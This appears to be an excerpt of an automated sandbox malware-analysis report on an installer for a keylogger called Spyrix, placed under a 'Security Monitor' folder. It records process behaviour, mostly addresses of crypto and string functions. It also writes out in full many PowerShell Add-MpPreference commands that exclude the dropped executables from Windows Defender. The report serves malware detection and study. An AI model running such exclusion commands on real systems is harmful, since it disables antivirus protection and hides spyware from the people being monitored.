Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd

Contains functionality to call native functions

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376252 NtdllDefWindowProc_A,

56_2_03376252

Contains functionality to communicate with device drivers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03375FFA: DeviceIoControl,

56_2_03375FFA

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_02CBDC34	7_2_02CBDC34
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053C6E90	7_2_053C6E90
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053C0013	7_2_053C0013
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053C0040	7_2_053C0040
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053C6E80	7_2_053C6E80
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053CD937	7_2_053CD937
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_053CD948	7_2_053CD948
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_08EB0D98	7_2_08EB0D98
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_0A660040	7_2_0A660040
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_0A66A920	7_2_0A66A920
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_0A662DF0	7_2_0A662DF0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_008695C1	56_2_008695C1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0338110C	56_2_0338110C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_03380538	56_2_03380538
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_03396654	56_2_03396654
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033AE88C	56_2_033AE88C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033A1D50	56_2_033A1D50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0037B890	71_2_0037B890
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003720F0	71_2_003720F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0036A132	71_2_0036A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003D0130	71_2_003D0130
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00384170	71_2_00384170
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003DA140	71_2_003DA140
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0036A132	71_2_0036A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003BA340	71_2_003BA340
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0038E590	71_2_0038E590
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0038F5D0	71_2_0038F5D0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_005E85B0	71_2_005E85B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00370620	71_2_00370620
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003B66B0	71_2_003B66B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003836A0	71_2_003836A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003976C0	71_2_003976C0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003BA7B0	71_2_003BA7B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003959E0	71_2_003959E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00379A20	71_2_00379A20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00392A9D	71_2_00392A9D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_003D8C20	71_2_003D8C20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00389D10	71_2_00389D10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0036A132	71_2_0036A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00361F10	71_2_00361F10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00376F90	71_2_00376F90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63

Found potential string decryption / allocating functions

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: String function: 0339565C appears 36 times
